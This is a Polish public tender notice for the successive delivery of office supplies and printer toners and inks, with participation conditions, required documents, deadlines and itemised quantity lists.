<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 1 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 2 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 4 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana wg formuły: spełnia - nie spełnia. Z treści złożonych dokumentów lub oświadczeń musi wynikać jednoznacznie, iż postawione warunki Wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony umowy dopuszczają ewentualną zmianę następujących postanowień umownych:
- możliwość zmiany umowy w sprawie udzielenia zamówienia publicznego w razie zmiany w przepisach prawa podatkowego, które dotyczą świadczenia usług lub dokonywania dostaw stanowiących przedmiot Umowy , w szczególności zmian w zakresie ustawy z dnia 11 marca 2004r o podatku od towarów i usług , przepisów wykonawczych do niej lub aktów prawnych, które tę ustawę lub przepisy wykonawcze zastąpią. Warunkiem zmiany Umowy jest wystąpienie w okresie obowiązywania Umowy takiej zmiany w przepisach prawa podatkowego, która wpływa na obowiązek lub uprawnienia którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgkim.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego - Al. Zjednoczenia 110, pokój 101.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2013 godzina 08:00, miejsce: Oferty należy składać w siedzibie Zamawiającego pokój 101, lub w kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje sukcesywną dostawę do siedziby Zamawiającego oraz do komórek organizacyjnych znajdujących się przy ul.  Jedności 65, ul.Pl. Matejki 3d, ul. Sowińskiego 44a ul. Waryńskiego 2, ul.Wrocławska 73 w  terminie 24 godzin od otrzymania informacji o koniecznej dostawie określonego asortymentu - transportem wykonawcy i na koszt wykonawcy materiałów biurowych - zgodnie z poniższym orientacyjnym zestawieniem.                                                                                                                                                 Przy czym zamawiający informuje, iż zakres zamawianego asortymentu może ulec zmianie do 10% wartości zamówienia. Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia.                                                                                                                                    

Zestawienie towaru:
Zestawienie towaru:
-BLOK BIUROWY A4 100 KARTEK	-115	szt
-BLOK BIUROWY A5 100 KARTEK 	-120	szt
-BRULION A4  96 KRATA  	-50	szt
-BRULION A5 96 KRATA	-20	szt
-CIENKOPIS Z FIBROWĄ KOŃCÓWKĄ PISZĄCĄ, OPRAWIONĄ W METAL O GRUBOŚCI 0,4 MM, TUSZ NA BAZIE WODY, WENTYLOWANA SKUWKA, RÓŻNE KOLORY	-170	szt
-PIÓRO KULKOWE Z WYMIENNYM WKŁADEM, TUSZ ODPORNY NA WARUNKI ATMOSFERYCZNE, WYKONANY W MIN. 80% Z MATERIAŁÓW PRZETWORZONYCH, GRUBOŚC LINI PISANIA 0,35MM, DŁUGOŚC LINI PISANIA 600M, RÓŻNE KOLORY	-320	szt
DŁUGOPIS NA SPRĘŻYNCE PRZYKLEJANY DO BIURKA 	-20	szt
-DŁUGOPIS Z WYMIENNYM WKŁADEM OLEJOWYM, WODOODPORNYM I NIEBLAKNĄCYM, GUMOWY UCHWYT , PISZE PO KAŻDYM PAPIERZE,GRUBOŚĆ LINII PISANIA 0,27 MM , DŁUGOŚĆ LINI PISANIA 900M, RÓŻNE KOLORY	-200	szt
-DŁUGOPIS OLEJOWY  AUTOMATYCZNY PLASTIKOWA OBUDOWA Z NADRUKIEM W GWIAZDKI	-20	szt
 	-DŁUGOPIS OLEJOWY  PLASTIKOWA OBUDOWA Z NADRUKIEM W GWIAZDKI	-20	 
-DŁUGOPIS OLEJOWY ZWYKŁY	-400	szt
-DŁUGOPIS OLEJOWY, AUTOMATYCZNIE CHOWANY WKŁAD, GUMOWY UCHWYT, WKŁAD WYMIENNY, GRUBOŚĆ LINI PISANIA 0,3MM, ŚREDNICA KULKI PISZĄCEJ 0,7 MM	-350	szt
-DRUK DOWÓD DOSTAWY A6/100 SZT	-270	bl
-DRUK EWIDENCJA CZASU PRAC ROCZ A5/100SZT. W BLOCZKU	-6	opk
-DRUK EWIDENCJA WYJŚĆ W GODZ. SŁUŻBOWYCH A4/100SZT 	-10	bl
-DRUK EWIDENCJA WYPOSAŻENIA A5/SZT KARTON	-65	szt
-DRUK KP A6/100 -160	bl
-DRUK  KSIĄŻKA DRUKÓW ŚCISŁEGO ZARACHOWANIA P-23	-28	szt
-DRUK KARTA MAGAZYNOWA A5/100SZT	-35	bl
-DRUK RAPORT KASOWY A4/100 SZT K-7	-5	bl
-DRUK KSIĄŻKA POCZTOWA A5 	-32	szt
-DRUK ROZLICZENIE ZALICZKI A6 100 SZT	-6	bl
-DRUK MW 80 SZT	22	-bl
-DRUK KW A6/100 SZT	-55	bl
-DRUK MM A5/100 SZT	-55	bl
-DRUK POLECENIE PRZELEWU A6 1+1/100 SZT	-5	bl
-DRUK RAPORT DZIENNY PRAC SPRZĘTU A5/100 SZT	-25	bl
-DRUK WYWIESZKA MAGAZYNOWA KARTON A6/100 SZT	-40	bl
-DRUK ZW 1/3 A4  6 POZYCYJNY 	-65	bl
-DRUK KARTA PRZEBIEGU ZATRUDNIENIA A4	-850	szt
-DZIURACZ WYKONANY Z METALU Z ANTYPOŚLIZGOWĄ PODSTAWĄ NIERYSUJĄCA MEBLI, DZIURKUJE DO 30 KARTEK JEDNORAZOWO, PRESYZYJNY OGRANICZNIK FORMATU Z OKIENKIEM DO JEGO PODGLĄDU, 10 LAT GWARANCJI	-15	szt
-ETYKIETY SAMOPRZYLEPNE 210X297    100 AKUSZY W OPAKOWANIU	-3	opk
-ETYKIETY SAMOPRZYLEPNE  70X37  100 ARKUSZY W OPAKOWANIU	-10	opk
-ETYKIETY DO SEGREGATORA 7CM SAMOPRZYLEPNE	-20	opk
-FASTYKUŁA A4 KPL Z TAŚMĄ	-1000	kpl
-FOLIOPIS  LINIA PISANIA 1,0	-16	szt
-GUMKA DO MAZANIA BIAŁA 	-90	szt
-KALKULATOR 10 POZYCYJNY , POCHYLONY WYŚWIETLACZ, KLAWISZ COFANIA, PODWÓJNEGO ZERA, PODWÓJNE ZASILANIE, FUNKCJA CHECK&CORRECT, WYMIARY 135X143X27	-10	szt
-KALKULATOR 12 POZYCYJNY, PODWÓJNA PAMIĘĆ, ZAIKRĄGLANIE WYNUKÓW, OBLICZANIE MARŻY, KLAWISZ COFANIA, PODWÓJNEGO ZERA, PODWÓJNE ZASILANIE, WYMIARY 154X152X28,5	-10	szt
-KLEJ W SZTYFCIE 15G	-120	szt
-KLIPS 19MM/12 SZT	-190	opk
-KLIPS 32MM/12 	-150	opk
-KLIPS 51MM/12 	-50	opk
-KOPERTA BIAŁA B4/50  HK	-30	opk
-KOPERTA BIAŁA B5/50  SK	-30	opk
-KOPERTA BIAŁA C5/50  SK	-20	opk
-KOPERTA BIAŁA C4/50  SK	-12	opk
-KOPERTA BIAŁA C6/1000 OKNO PRAWE SK-	6	opk
-KOPERTA BIAŁA C6/1000 SK	-20	opk
-KOPERTA BIAŁA C6/50 SK	-40	opk
-KOPERTA BIAŁA DL/1000 OKNO PRAWE SK	-130	opk
-KOPERTA RBD BIAŁA B4/10 SZT. HK	-15	opk
-KOPERTA BIAŁA DL/50  SK	-20	opk
-KOREKTOR W PŁYNIE 	-40	szt
-KOREKTOR W TAŚMIE Z WYMIENNYM WKŁADEM, SZEROŚĆ 4,2MM DŁUGOŚĆ 6M, WYKONANY Z MATERIAŁÓW PRZETWORZONYCH	-150	szt
-KOREKTOR WKŁAD PILOT	-230	szt
-KSIĄŻKA KORESP. 96K BARBARA	-52	szt
-LINIJKA 20CM  	-22	szt
-LINIJKA 30CM 	-10	szt
-MAZAK CD GRUBOŚĆ 1.0 CZARNY	-32	szt
-MAZAK DO ZNAKOWANIA BIELIZNY ALUMINIOWA OBUDOWA, LINIA PISANIA 1 MM, OKRĄGŁA KOŃCÓWKA	-10	szt
-MARKER PERMANENTNY , WODOODPORNY, NIE BLAKNIE POD WPŁYWEM SŁOŃCA, W ALUMINIOWEJ OBUDOWIE, ODPORNY NA WYSYCHANIE, WYTRZYMAŁA KOŃCÓWKA WYKONANA Z FIBRY, MOŻLIWOŚĆ WIELOKROTNEGO NAPEŁNIANIA TUSZEM, NIE ZAWIERA KSYLENU OKRAGŁA KOŃCÓWKA , LINIA PISANIA 1 MM DŁUGOŚĆ LINI PISANIA 900M 	-120	szt
-NOTES KOST BIAŁA  KLEJONA  	-130	szt
-NOTES SAMOPRZYLEPNY 76X76   ŻÓŁTY	-400	szt
-ZAKŁADKI INDEKSUJĄCE SAMOPRZYLEPNE ROZMIAR 4X20X50 	-210	opk
-NOŻYCZKI 16 Z MIĘKKA RĄCZKĄ	-10	szt
-NOŻYCZKI 17  Z MIĘKKĄ RĄCZKĄ	-15	szt
-OBWOLUTA  A4/100 SZT GROSZKOWA	-120	opk
-OBWOLUTA A5/100 SZT GROSZKOWA	-30	opk
-OBWOLUTA  Z KLAPKA A4/10 SZT	-140	opk
-OŁÓWEK	-130	szt
-PAPIER DO FAXU 210/30 	-10	szt
-PAP KOM 240X12 1 WARSTWA-	10	kar
-PAP KOM 240X12 2  WARSTWA-	15	kar
-PAP KOM 240X12 2 WARSTWY Z  NADRUKIEM	-10	szt
-PAP KOM 240X12 3 WARSTWY	-5	kar
-PAP KOM 360X12 1  WARSTWA-15	szt
-PAPIER KSERO A3 BIAŁY 80 GRAM BIAŁOŚĆ CIE MINIMUM 165 	-20	ryza
-PAPIER KSERO A4 BIAŁY 80 GRAM BIAŁOŚĆ CIE MINIMUM 165 	-3200	ryza
-PASEK SKOROSZYTOWY PLASTKOWY 25 SZT W OPAKOWANIU	-10	szt
-PIÓRO KULKOWE ZE SPECJALNYM DOZOWNIKIEM PRZEPŁYWU ATRAMENTU, PISZE NIEPRZERWANIE DO OSTATNIEJ KROPLI. ERGONOMICZNY GUMOWY UCHWUT, GŁOWICA PISZĄCA ZE STALI NIERDZEWNEJ, KULKA WYKONANA ZE STOPU WOLFRAMU I WEGLIKA, WENTYLOWANA SKUWKA Z KLIPEM, DŁUGOŚC LINI PISANIA 1400M, LINIA PISANIA 0,3 MM.	-90	szt
-PIÓRO KULKOWE AUTOMATYCZNE, TUSZ PIGMENTOWY, WODOODPORNY, ZASYCHA W CIĄGU 1 SEKUNDY, PISZE PO ŚLISKIM PAPIERZE, NIE PRZESIĄKA PRZEZ PAPIER,WYMIENNY WKŁAD.	-20	szt
-PIÓRO ŻELOWE AUTOMATYCZNE	-70	szt
-PISAKI 12 KOLORÓW W OPAKOWANIU-	5	opk
-PŁYTA CD W PLASTKOWYM OPAKOWANIU	-80	szt
-PŁYTA DVD W PLASTKOWYM OPAKOWANIU	-150	szt
-PODKŁAD DO PISANIA PCV A4 	-5	szt
-PODKŁAD NA BIURKO SKÓROPODOBNY Z PRZYBORNIKIEM I WYPOSAŻENIEM 	-10	szt
-PODKŁAD DO PISANIA PCV A4 Z OKŁADKĄ -	20	szt
-CHUSTECZKI NASĄCZONE DO CZYSZCZENIA EKRANU LCD-	35	szt
-SPRĘŻONE POWIETRZE DO CZYSZCZENIA SPRZĘTU KOMPUTEROWEGO	-5	szt
-PRZEKŁADKI  KARTONOWE KOLOR PRZEKŁDAKI ODPOWIADA KOLOROWI INDEKSU, WYKONANE Z KARTONU 170G/M2 UZYSKANE W DRODZE RECYKLINGU, POSIADAJĄ KARTĘ OPISOWĄ ORAZ PERFORACJĘ A4 12 STRON	-90	opk
-PRZEKŁADKI KARTONOWE A4 Z KOLOROWYMI INDEKSAMI WZMOCNIONYMI FOLIĄ MYLAR 1-12	-65	opk
-PRZEKŁADKI KARTONOWE A4 Z KOLOROWYMI INDEKSAMI WZMOCNIONYMI FOLIĄ MYLAR 1-31	-15	opk
-PRZEKŁADAKI WĄSKIE KARTONOWE OP.100 SZT. KOLOROWE-	10	opk
-ROLKI OFSETOWE 57/10-30M	-20	opk
-ROZSZYWACZ 	-10	szt
-PINEZKI SREBRNE 50SZT. OPAKOWANIE	-6	opk
-SEGREGATOR OKLEINOWANY JEDNOSTRONNIE POLIPROPYLENEM, KOLOROWY, SZEROKOŚC 50 MM, MECHANIZM DŹWIGNIOWY METALOWY, ZMOCNIONY OTWÓR NA PALEC, METALOWA LISTWA NA DOLE ZAPOBIEGAJACA ROZWARTWIANIU SEGREGATORA, WYMIENNA ETYKIETA OPISOWA	-280	szt
-SEGREGATOR OKLEINOWANY JEDNOSTRONNIE POLIPROPYLENEM, KOLOROWY, SZEROKOŚC 70 MM, MECHANIZM DŹWIGNIOWY METALOWY, ZMOCNIONY OTWÓR NA PALEC, METALOWA LISTWA NA DOLE ZAPOBIEGAJACA ROZWARTWIANIU SEGREGATORA, WYMIENNA ETYKIETA OPISOWA	-650	szt
-SKOROSZYT BIAŁY A4 KARTONIOWY	-390	szt
-SKOROSZYT OCZKOWY 1/1 BIAŁY-2200	szt
-SKOROSZYT OCZKOWY 1/2 BIAŁY	-600	szt
-SKOROSZYT POLIPROPYLENOWY-	400	szt
-SKOROSZYT ZAWIESZANY PCV- 	500	szt
-SKOROSZYT PCV	-20	szt
 -SKOROSZYT POLIPROPYLENOWY ZAWIESZANY-	550	szt
-SKOROSZYT ZAWIESZANY 1/1 BIAŁY	-220	szt
-SKOROSZYT ZAWIESZANY 1/2 BIAŁY-	50	szt
-SKOROWIDZ A4  96 KARTEK-	5	szt
-SPINACZE 28/100 OKRĄGŁE	-350	opk
-SPINACZE 50/100 OKRĄGŁE	-70	opk
-TACKA NA DOKUMENTY A4 PLASTIKOWA -	40	szt
-TAŚMA BIUROWA 18X20M	-250	szt
-TAŚMA ARCHIWIZACYJNA DŁUGOŚC NA ZWOJU 100M BAWEŁNA 	-25	szt
-TAŚMA PAKOWA  BRĄZ AKRYL-	35	szt
-TECZKA DO PODPISU  10 KARTEK-	30	szt
-TECZKA WIĄZANA BIAŁA A4	-750	szt
-TECZKA Z GUMKĄ BIAŁA  A4	-230	szt
-TECZKA Z GUMKĄ Z PRESZPANU, GUMKA NAROŻNIKOWA W KOLORZE CZARNYM, TEKTURA 380 GRAM	-300	szt
-TECZKA Z GUMKĄ JEDNOSTRONNIE BARWIONA, LAKIEROWANA, TEKTURA 400 GRAM	-220	szt
-TECZKA Z RZEPEM SKRZYDŁOWA KOLOROWA	-25	szt
-TEMPERÓWKA METALOWA POJEDYŃCZA	-30	szt
-TUSZ DO STĘPLI CZARNY	-20	szt
-TUSZ DO STĘPLI CZERWONY-	5	szt
-TUSZ DO STĘPLI METALOWYCH	-5	szt
-WKŁAD DO DŁUGOPISU POPULARNEGO-	50	szt
-WKŁAD DO DŁUGOPISU Z POZYCJI 8 CZARNY (SN 100,101)	-10	szt
-WKŁAD DO DŁUGOPISU Z POZYCJI 8 CZERWONY (SN 100,101)	-5	szt
-WKŁAD DO DŁUGOPISU Z POZYCJI 8 NIEBIESKI (SN 100,101)-	200	szt
-WKŁAD DO PIÓRA Z POZYCJI 87 NIEBIESKIE, CZARNE	-10	szt
-WKŁAD ŻELOWY AUT CZARNY	-5	szt
-WKŁAD ŻELOWY AUT  CZERWONY	-30	szt
-WKŁAD ŻELOWY AUT NIEBIESKI-	100	szt
-WKŁAD ŻELOWY PILOT G-2 NIEBIESKI-	10	szt
-ZAKREŚLACZ RÓŻNE KOLORY-	280	szt
-ZESZYT 16 KRATA-	15	szt
-ZESZYT 32 KRATA 	-25	szt
-ZESZYT 60 KRATA	-20	szt
 -BRULION A4  96 KRATA - 	5	szt
-ZESZYT A4  96 KRATA 	-5	szt
-ZSZYWACZ WYKONANY Z TRWAŁEGO PLASTIKU , OBROTOWA KOŃCÓWKA, TRZY SPOSOBY ZSZYWANIA, ZSZYWA DO 30 KARTEK JEDNORAZOWO, NA ZSZYWKI 24/6 I 26/6, GŁĘBOKOŚC WSUWANIA KARTKI 65MM, GWARANCJA MINIMUM 5 LAT	-60	szt
-ZSZYWKI 10 	-110	opk
-ZSZYWKI 24/6  	-280	opk
-ZWILŻACZ ŻELOWY DO PALCÓW 20ML 	-15	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.60-0, 30.19.21.21-5, 30.19.76.44-2, 30.19.92.30-1, 30.19.72.00-8, 30.19.21.30-1, 30.14.12.00-1, 30.19.93.30-2, 30.19.73.00-9, 30.21.60.00-6, 30.23.43.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa tonerów, tuszy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje sukcesywną dostawę do siedziby Zamawiającego, transportem wykonawcy i na koszt Wykonawcy tonerów do drukarek laserowych i faksów, taśm barwiących, taśm magnetycznych, głowic barwiących do maszyn drukujących według niżej podanego zestawienia, lub materiałów równoważnych.            

Zestawienie towaru:
-Taśma OKI 320-	205 szt
-CANON PGI-5 BK-	2 szt
-CANON PGI-520 BK-	11szt
-CANON K CLI-521 CYAN	-7szt
-CANON K CLI-521 MAGENTA	-7szt
-CANON K CLI-521 YELLOW	-7szt
-CANON K CLI-8C CYAN	-2szt
-CANON K CLI-8M MAGENTA	-2szt
-CANON K CLI-8Y YELLOW	-2szt
 -HP 51645A 45 BK	-2szt
-HP C4844A 10 BK	-3szt
-HP C4906A 940XL BK	-9szt
-HP C6656A 56 BK	-2szt
-HP C8765E 338 BK	-2szt
-HP K C4836A 11CYAN	-3szt
-HP K C4838A 11 YELLOW	-2szt
-HP K C4837A 11 MAGENTA	-2szt
-HP K C4907A 940XL CYAN	-7szt
-HP K C4908A 940HL MAGENTA	-7szt
-HP K C4909A 940XL YELLOW	-7szt
-HP K C6657A 57	-2szt
-HP K C8766E 343	-5szt
-HP L C3906A BK 5L/6L	-2szt
-HP L C4092A BK 1100/3200	-15szt
-HP L C7115A BK 1200	-11szt
-HP L CB436A BK P1505	-5szt
-HP L CC530A BK	-5szt
-HP L CC531A CYAN-	2szt
-HP L CC532A YELLOW	-3szt
-HP L CC533A MAGENTA	-2szt
-HP L CE255A BK	-60szt
-HP L CE278A BK	-3szt
-HP L CE285A BK	-8szt
-HP L CE505A BK	-8szt
-HP L Q2610A BK 2300	-10szt
-HP L Q2612A BK 1010	-2szt
-HP L Q2613A BK 1300	-11szt
-HP L Q5942A BK 4250	-2szt
-HP L Q5949A BK 1160/1320	-53szt
-HP L Q7551A BK 3005	-9szt
-HP L Q7553A BK 2015	-15szt
-LEXMARK E120	-8szt
-SAMSUNG SCX-4521D3	-4szt
-CANON CL-513 MP240/260 3-KOLORY	-2szt
-CANON PG-512 BK MP240/260/480	-2szt
-CANON PGI-520 BK IP3600/4600/MP620	-8szt
-HP-C4902AE (940) BLACK	-2szt
-TAŚMA DO STRIMERA HP C5709A	-35szt
-TONER KONICA MI 102B	-2szt
-TONER KONICA MI 103B	-6szt
-TONER KONICA MI 204B	-2szt
-TONER KONICA MI 302B	-2szt
-TONER KONICA MI TN-303K	-2szt
-TONER LEX E 120 BĘBEN	-1szt
-TONER PANA KX-FA 83E	-1szt
-TONER PHILIPS PFA741	-2szt
-TONER SHARP AR-202T	-5szt
-TONER SHARP MX206 GT	-3szt
